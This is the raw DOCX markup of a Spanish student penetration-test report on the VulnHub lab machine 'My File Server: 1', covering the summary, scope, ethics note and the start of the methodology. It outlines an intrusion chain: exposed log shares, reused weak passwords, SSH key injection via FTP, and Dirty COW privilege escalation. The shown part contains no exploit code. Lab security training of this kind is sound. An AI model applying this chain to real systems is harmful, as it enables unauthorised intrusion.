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4203A" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="6"/>
          <w:szCs w:val="6"/>
        </w:rP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4203A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="520"/>
              <w:left w:type="dxa" w:w="420"/>
              <w:bottom w:type="dxa" w:w="420"/>
              <w:right w:type="dxa" w:w="4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A7A0"/>
                <w:spacing w:val="12"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">RED TEAM · INFORME DE PRUEBAS DE PENETRACIÓN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My File Server: 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="220"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D3E6"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Evaluación de seguridad ofensiva paso a paso sobre una infraestructura de archivos compartidos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020"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="F5C93F" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIDENCIAL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="9FB0CC"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   Documento con fines académicos — entorno aislado y autorizado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A7A0" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="3B2E5A" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F7941D" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="E4477A" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="12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0" w:before="360"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideH w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideV w:val="single" w:color="D4DAE6" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="6360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/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Objetivo evaluado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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203A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">My File Server: 1 (VulnHub) · CentOS 7 · host “fileserver”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/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Dirección IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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203A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.56.104 (red host-only aislada 192.168.56.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/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Tipo de ejercicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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203A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Caja negra (black box) · Red Team / CTF boot2root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/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Metodología</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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203A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PTES · OWASP Testing Guide · MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/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Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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203A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromiso total — acceso root obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/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Fecha del engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="63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203A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">30 de septiembre – 01 de octubre de 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1EA7A0" w:sz="12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A7A0"/>
                <w:spacing w:val="8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Elaborado por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4203A"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Juan Francisco Ortega Jiménez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5B6472"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Matrícula 184918 · Ing. en Tecnologías de la Información · UPSLP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B6472"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Materia: Fundamentos de Ciberseguridad · Docente: Mtro. Servando López Contreras</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B2E5A" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Contenido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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1  Resumen ejecutivo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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2  Alcance y reglas de enfrentamiento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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3  Metodología aplicada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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4  Fase I — Reconocimiento (paso a paso)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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5  Fase II — Enumeración (paso a paso)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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">6  Fase III — Explotación / acceso inicial (paso a paso)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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">7  Fase IV — Escalada de privilegios (paso a paso)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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">8  Fase V — Post-explotación y evidencia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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">9  Análisis de impacto (modelo CIA)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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">10  Resumen de hallazgos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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">11  Recomendaciones técnicas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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">12  Conclusión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color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">›  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">13  Referencias</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E4477A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E4477A" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumen ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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Se ejecutó una prueba de penetración de caja negra contra el servidor “My File Server: 1”, un sistema CentOS 7 cuyo propósito es ofrecer servicios de archivos compartidos (FTP, SMB y NFS). El ejercicio se realizó en un laboratorio virtual completamente aislado, con fines estrictamente académicos y defensivos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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El resultado fue un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">compromiso total del sistema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: partiendo únicamente de acceso de red, se obtuvo una sesión interactiva como usuario sin privilegios y, posteriormente, se escaló hasta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">root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(control administrativo absoluto). La cadena de ataque no dependió de una única falla, sino del </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">encadenamiento de varias malas configuraciones y software obsoleto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"/>
        <w:gridCol w:w="9200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160"/>
            <w:shd w:fill="E4477A" w:val="clear"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9200"/>
            <w:shd w:fill="FCE4E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line="26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203A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Veredicto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El servidor es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A35"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">altamente vulnerable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. Cualquier atacante con acceso a la red podría leer, modificar o destruir toda la información del sistema. Se recomienda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A35"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">remediación inmediata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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">▍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Síntesis de la cadena de ataque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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exposición de información: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el directorio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/var/log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se compartía por NFS y SMB, revelando configuración y actividad del sistema.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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Credenciales débiles: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el usuario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smbuser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reutilizaba contraseñas triviales (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smbuser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en Samba y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rootroot1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en el sistema).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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Acceso inicial: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con la credencial del sistema se inyectó una llave SSH a través del servicio FTP, obteniendo una shell como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smbuser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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalada a root: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el kernel 3.10.0-229 era vulnerable a Dirty COW (CVE-2016-5195), permitiendo convertirse en administrador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1EA7A0" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Alcance y reglas de enfrentamiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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El alcance se limitó a un único activo dentro de una red de laboratorio sin conexión a Internet ni a redes de producción. El objetivo fue identificar y demostrar, de forma controlada, vías de compromiso del sistema, documentando cada paso con evidencia reproducible.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideH w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideV w:val="single" w:color="D4DAE6" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2600"/>
        <w:gridCol w:w="6760"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/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Dentro de alcance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Servidor 192.168.56.104 (todos sus servicios de red expuestos).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/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Fuera de alcance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Cualquier otro host, denegación de servicio sostenida e ingeniería social.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/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Plataforma atacante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Kali Linux (192.168.56.105), adaptador host-only en modo aislado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/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Autorización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Entorno propio del estudiante; actividad académica supervisada por el docente.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"/>
        <w:gridCol w:w="9200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160"/>
            <w:shd w:fill="F7941D" w:val="clear"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9200"/>
            <w:shd w:fill="FFF6D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line="26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203A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nota ética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Todas las técnicas se aplicaron contra una máquina deliberadamente vulnerable (VulnHub) en una red aislada. Ninguna acción se ejecutó contra sistemas de terceros ni redes reales.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">03</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B2E5A" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodología aplicada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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El engagement siguió una metodología estructurada basada en el </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing Execution Standard (PTES)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, complementada con la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide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y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK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. El trabajo se organizó en cinco fases secuenciales, documentadas paso a paso en las secciones siguientes.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideH w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideV w:val="single" w:color="D4DAE6" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="2600"/>
        <w:gridCol w:w="6000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:shd w:fill="14203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600"/>
            <w:shd w:fill="14203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6000"/>
            <w:shd w:fill="14203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60"/>
            <w:shd w:fill="1EA7A0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203A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconocimiento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Descubrimiento del host y mapeo de la superficie de ataque.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:shd w:fill="3B2E5A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II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203A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumeración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Identificación de servicios, usuarios, recursos y configuraciones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:shd w:fill="F7941D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III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203A"/>
                <w:sz w:val="19"/>
